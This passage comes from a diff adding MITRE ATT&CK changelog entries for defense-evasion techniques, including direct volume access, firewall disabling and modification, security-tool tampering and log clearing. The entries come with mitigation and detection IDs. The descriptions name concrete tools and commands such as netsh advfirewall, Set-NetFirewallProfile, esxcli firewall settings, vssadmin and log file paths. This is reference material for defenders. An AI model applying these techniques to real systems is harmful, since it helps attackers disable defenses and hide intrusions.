+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Tom Simpson, CrowdStrike Falcon OverWatch"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-15 19:59:05.018000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.(Citation: Hakobyan 2009)\\n\\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)\", \"old_value\": \"Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\\n\\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\\n+Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.(Citation: Hakobyan 2009)\\n \\n Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)\"}}}",
+                    "previous_version": "3.0",
+                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to0__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to0__0\"><a href=\"#difflib_chg_to0__top\">t</a></td><td class=\"diff_header\" id=\"from0_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;directly&nbsp;access&nbsp;a&nbsp;volume&nbsp;to&nbsp;bypass&nbsp;file&nbsp;acce</td><td class=\"diff_next\"><a href=\"#difflib_chg_to0__top\">t</a></td><td class=\"diff_header\" id=\"to0_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;directly&nbsp;access&nbsp;a&nbsp;volume&nbsp;to&nbsp;bypass&nbsp;file&nbsp;acce</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ss&nbsp;controls&nbsp;and&nbsp;file&nbsp;system&nbsp;monitoring.&nbsp;Windows&nbsp;allows&nbsp;progr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ss&nbsp;controls&nbsp;and&nbsp;file&nbsp;system&nbsp;monitoring.&nbsp;Windows&nbsp;allows&nbsp;progr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ams&nbsp;to&nbsp;have&nbsp;direct&nbsp;access&nbsp;to&nbsp;logical&nbsp;volumes.&nbsp;Programs&nbsp;with&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ams&nbsp;to&nbsp;have&nbsp;direct&nbsp;access&nbsp;to&nbsp;logical&nbsp;volumes.&nbsp;Programs&nbsp;with&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">direct&nbsp;access&nbsp;may&nbsp;read&nbsp;and&nbsp;write&nbsp;files&nbsp;directly&nbsp;from&nbsp;the&nbsp;dri</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">direct&nbsp;access&nbsp;may&nbsp;read&nbsp;and&nbsp;write&nbsp;files&nbsp;directly&nbsp;from&nbsp;the&nbsp;dri</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ve&nbsp;by&nbsp;analyzing&nbsp;file&nbsp;system&nbsp;data&nbsp;structures.&nbsp;This&nbsp;technique&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ve&nbsp;by&nbsp;analyzing&nbsp;file&nbsp;system&nbsp;data&nbsp;structures.&nbsp;This&nbsp;technique&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">may&nbsp;bypass&nbsp;Windows&nbsp;file&nbsp;access&nbsp;controls&nbsp;as&nbsp;well&nbsp;as&nbsp;file&nbsp;syst</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">may&nbsp;bypass&nbsp;Windows&nbsp;file&nbsp;access&nbsp;controls&nbsp;as&nbsp;well&nbsp;as&nbsp;file&nbsp;syst</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">em&nbsp;monitoring&nbsp;tools.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Hakobyan&nbsp;2009)&nbsp;&nbsp;Utilities,&nbsp;s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">em&nbsp;monitoring&nbsp;tools.(Citation:&nbsp;Hakobyan&nbsp;2009)&nbsp;&nbsp;Utilities,&nbsp;su</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uch&nbsp;as&nbsp;`NinjaCopy`,&nbsp;exist&nbsp;to&nbsp;perform&nbsp;these&nbsp;actions&nbsp;in&nbsp;PowerS</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ch&nbsp;as&nbsp;`NinjaCopy`,&nbsp;exist&nbsp;to&nbsp;perform&nbsp;these&nbsp;actions&nbsp;in&nbsp;PowerSh</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hell.(Citation:&nbsp;Github&nbsp;PowerSploit&nbsp;Ninjacopy)&nbsp;Adversaries&nbsp;ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ell.(Citation:&nbsp;Github&nbsp;PowerSploit&nbsp;Ninjacopy)&nbsp;Adversaries&nbsp;may</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;also&nbsp;use&nbsp;built-in&nbsp;or&nbsp;third-party&nbsp;utilities&nbsp;(such&nbsp;as&nbsp;`vssad</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;also&nbsp;use&nbsp;built-in&nbsp;or&nbsp;third-party&nbsp;utilities&nbsp;(such&nbsp;as&nbsp;`vssadm</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">min`,&nbsp;`wbadmin`,&nbsp;and&nbsp;[esentutl](https://attack.mitre.org/sof</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">in`,&nbsp;`wbadmin`,&nbsp;and&nbsp;[esentutl](https://attack.mitre.org/soft</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tware/S0404))&nbsp;to&nbsp;create&nbsp;shadow&nbsp;copies&nbsp;or&nbsp;backups&nbsp;of&nbsp;data&nbsp;fro</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ware/S0404))&nbsp;to&nbsp;create&nbsp;shadow&nbsp;copies&nbsp;or&nbsp;backups&nbsp;of&nbsp;data&nbsp;from</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">m&nbsp;system&nbsp;volumes.(Citation:&nbsp;LOLBAS&nbsp;Esentutl)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;system&nbsp;volumes.(Citation:&nbsp;LOLBAS&nbsp;Esentutl)</td></tr>\n        </tbody>\n    </table>",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0426: Detection of Direct Volume Access for File System Evasion"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--eec096b8-c207-43df-b6c1-11523861e452",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:53:27.275000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Disable or Modify System Firewall",
+                    "description": "Adversaries may disable or modify host-based or network firewalls to impair defensive mechanisms and enable further action. Once an adversary has gathered sufficient privileges, they can tamper with firewall services, policies, or rule sets to remove restrictions on inbound or outbound traffic. For example, this may include turning off firewall profiles, altering existing rules to permit previously blocked ports or protocols, or adding new rules that create covert communication paths (e.g., adding a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port.(Citation: change_rdp_port_conti)\n\nAdversaries may disable or modify firewalls using different behaviors, depending on the platform. For example, in ESXi, firewall rules may be modified directly via the esxcli (e.g., via esxcli network firewall set) or via the vCenter user interface.(Citation: Broadcom ESXi Firewall)(Citation: Trellix Rnasomhouse 2024)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1686",
+                            "external_id": "T1686"
+                        },
+                        {
+                            "source_name": "Broadcom ESXi Firewall",
+                            "description": "Broadcom. (2025, March 24). Add Allowed IP Addresses for an ESXi Host by Using the VMware Host Client. Retrieved March 26, 2025.",
+                            "url": "https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/add-allowed-ip-addresses-for-an-esxi-host-by-using-the-vmware-host-client.html"
+                        },
+                        {
+                            "source_name": "Trellix Rnasomhouse 2024",
+                            "description": "Pham Duy Phuc, Max Kersten, No\u00ebl Keijzer, and Micha\u00ebl Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025.",
+                            "url": "https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/"
+                        },
+                        {
+                            "source_name": "change_rdp_port_conti",
+                            "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved September 12, 2024.",
+                            "url": "https://x.com/TheDFIRReport/status/1498657772254240768"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-22 15:36:31.474000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1024: Restrict Registry Permissions",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0145: Detection of Disabled or Modified System Firewalls across OS Platforms."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ee474564-64be-4b83-a958-53f238f49b01",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:04.618000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Cloud Firewall",
+                    "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources.\n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane.\n\nFor example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance. They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Expel AWS)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1686/001",
+                            "external_id": "T1686.001"
+                        },
+                        {
+                            "source_name": "Expel AWS",
+                            "description": "Anthony Randazzo, Britton Manahan, Sam Lipton. (2020, April 28). Managed Detection & Response for AWS. Retrieved April 15, 2026.",
+                            "url": "https://expel.com/blog/finding-evil-in-aws/"
+                        },
+                        {
+                            "source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022",
+                            "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.",
+                            "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arun Seelagan, CISA",
+                        "Expel"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-22 15:38:27.348000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0424: Detection Strategy for Disable or Modify Cloud Firewall"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a29aa77c-a88d-4f19-bab9-7751941b2e2d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:05.016000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Network Device Firewall",
+                    "description": "Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage.  \n\nAdversaries may obtain access to devices such as routers, switches, or other perimeter/network devices and change access control lists (ACLs), security zones, or policy rules to permit otherwise blocked traffic. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions. Allowing access to internal network subsets may enable unrestricted inbound/outbound connectivity or open paths for command and control and lateral movement.\n\nAdversaries may obtain access to network device management interfaces via [Valid Accounts](https://attack.mitre.org/techniques/T1078) or by exploiting vulnerabilities. In some cases, threat actors may target firewalls and other network infrastructure that are exposed to the internet by leveraging weaknesses in public-facing applications ([Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).(Citation: CVE-2024-55591 Detail)\n\nAdversaries may also modify host networking configurations that indirectly manipulate system firewalls, such as adjusting interface bandwidth or network connection request thresholds. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1686/002",
+                            "external_id": "T1686.002"
+                        },
+                        {
+                            "source_name": "CVE-2024-55591 Detail",
+                            "description": "NIST NVD. (2025, January 22). Retrieved September 22, 2025.",
+                            "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55591"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Marco Pedrinazzi, @pedrinazziM, InTheCyber",
+                        "Tommaso Tosi, @tosto92, InTheCyber"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-22 15:38:51.612000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0306: Detection of Unauthorized Network Firewall Rule Modification"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--291ede6c-1473-454c-b614-5ac5ea63c987",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:05.494000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Windows Host Firewall",
+                    "description": "Adversaries may disable or modify the Windows host firewall to bypass controls limiting network usage. This can include disabling the Windows host firewall entirely, suppressing specific profiles (domain, private, public), or adding, deleting, and modifying firewall rules to allow or restrict traffic.(Citation: Nearest Neighbor Volexity)\n\nAdversaries may perform these modifications through multiple mechanisms depending on the Windows operating system and access level. For example, adversaries may use command-line utilities (e.g., `netsh advfirewall` or PowerShell cmdlets like `Set-NetFirewallProfile`, `New-NetFirewallRule`), Windows Registry modifications (e.g., altering firewall states and rule configurations via registry keys), or the Windows Control Panel to modify firewall settings through the Windows Security interface.\n\nBy disabling or modifying Windows firewall services, adversaries may enable access to remote services, open ports for command and control traffic, or configure rules for further actions. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1686/003",
+                            "external_id": "T1686.003"
+                        },
+                        {
+                            "source_name": "Nearest Neighbor Volexity",
+                            "description": "Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.",
+                            "url": "https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2026-04-22 15:39:19.227000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1024: Restrict Registry Permissions",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0901: Detect Windows Firewall"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--bbde9781-60aa-4b8a-a911-895b0c1b3872",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:53:26.949000+00:00",
+                    "modified": "2026-05-12 15:12:00.712000+00:00",
+                    "name": "Disable or Modify Tools",
+                    "description": "Adversaries may disable, degrade, or tamper with security tools or applications (e.g., endpoint detection and response (EDR) tools, intrusion detection systems (IDS), antivirus, logging agents, sensors, etc.) to impair or reduce visibility of defensive capabilities. This may include stopping specific services, killing processes, modifying or deleting tool configuration files and Registry keys, or preventing tools from updating. This may also include impairing defenses more broadly by disrupting preventative, detection, and response mechanisms across host, network, and cloud environments.(Citation: SCADAfence_ransomware) \n\nIn addition to directly targeting tools, adversaries may block or manipulate indicators and telemetry used for detection. This includes maliciously disabling or redirecting sensors such as Event Tracing for Windows (ETW), modifying event log configurations (e.g., redirecting Security logs), or interfering with logging pipelines and forwarding mechanisms (e.g., SIEM ingestion).(Citation: Microsoft Lamin Sept 2017)(Citation: ETW Palantir)\n\nMore advanced techniques include leveraging legitimate drivers or debugging mechanisms to render tools non-functional, bypassing anti-tampering protections, and targeting specific defenses such as Sysmon or cloud monitoring agents. Adversaries may also disrupt broader defensive operations, including update mechanisms, logging infrastructure (e.g., syslog), or event aggregation, further degrading an organization\u2019s ability to detect and respond to malicious activity.(Citation: Cocomazzi FIN7 Reboot)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1685",
+                            "external_id": "T1685"
+                        },
+                        {
+                            "source_name": "Cocomazzi FIN7 Reboot",
+                            "description": "Cocomazzi, Antonio. (2024, July 17). FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks. Retrieved September 24, 2025.",
+                            "url": "https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/"
+                        },
+                        {
+                            "source_name": "Microsoft Lamin Sept 2017",
+                            "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.",
+                            "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"
+                        },
+                        {
+                            "source_name": "ETW Palantir",
+                            "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved April 15, 2026.",
+                            "url": "https://blog.palantir.com/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63"
+                        },
+                        {
+                            "source_name": "SCADAfence_ransomware",
+                            "description": "Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.",
+                            "url": "https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Alex Soler, AttackIQ",
+                        "Cian Heasley",
+                        "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
+                        "Gal Singer, @galsinger29, Team Nautilus Aqua Security",
+                        "Gordon Long, LegioX/Zoom, asaurusrex",
+                        "Lucas Heiligenstein",
+                        "Menachem Goldstein",
+                        "Nathaniel Quist, Palo Alto Networks",
+                        "Nay Myo Hlaing (Ethan), DBS Bank",
+                        "Rob Smith",
+                        "Sarathkumar Rajendran, Microsoft Defender365",
+                        "Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.712000+00:00\", \"old_value\": \"2026-04-22 15:39:46.202000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1024: Restrict Registry Permissions",
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1047: Audit",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0497: Detection of Defense Impairment through Disabled or Modified Tools across OS Platforms."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5e29d64d-2b14-4f92-875e-4c9c498e213c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:54:04.240000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Clear Linux or Mac System Logs",
+                    "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the `/var/log/` directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* `/var/log/messages:`: General and system-related messages\n* `/var/log/secure or /var/log/auth.log`: Authentication logs\n* `/var/log/utmp or /var/log/wtmp`: Login records\n* `/var/log/kern.log`: Kernel logs\n* `/var/log/cron.log`: Crond logs\n* `/var/log/maillog`: Mail server logs\n* `/var/log/httpd/`: Web server access and error logs",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1685/006",
+                            "external_id": "T1685.006"
+                        },
+                        {
